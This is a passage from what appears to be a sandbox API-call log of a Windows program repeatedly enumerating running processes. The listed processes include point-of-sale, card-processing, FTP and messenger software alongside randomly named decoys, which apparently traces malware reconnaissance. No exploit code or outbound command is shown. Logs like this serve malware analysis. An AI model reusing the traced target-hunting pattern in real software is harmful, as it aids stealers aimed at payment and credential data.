lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0202.396] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0202.399] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0202.402] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0202.405] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0202.408] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0202.411] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0202.414] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0202.417] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0202.420] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0202.426] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0202.429] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0202.432] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0202.435] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0202.438] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0202.441] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0202.444] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0202.447] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0202.450] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0202.453] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0202.456] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0202.459] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0202.467] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0202.470] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0202.473] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0202.512] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0202.515] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0202.518] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0202.520] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0202.523] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0202.526] CloseHandle (hObject=0x14a0) returned 1 [0202.526] Sleep (dwMilliseconds=0x64) [0202.631] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20c0 [0202.644] Process32First (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0202.646] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0202.647] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0202.649] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0202.653] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0202.656] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0202.658] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0202.660] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0202.663] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0202.666] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.687] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.691] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0202.693] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.694] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.697] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.698] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.700] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.703] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.706] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.709] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0202.711] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0202.713] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0202.715] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0202.718] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.720] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0202.722] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0202.724] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0202.756] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0202.759] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0202.761] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0202.763] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.765] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0202.766] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0202.768] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0202.770] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.772] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0202.774] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0202.776] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0202.780] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0202.782] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0202.784] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0202.786] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0202.787] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0202.789] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0202.832] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0202.834] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0202.836] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0202.838] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0202.840] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0202.842] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0202.845] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0202.846] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0202.848] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0202.850] Process32Next (in: hSnapshot=0x20c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0202.852] Process32Next (in: hSnapshot=0x20c0, 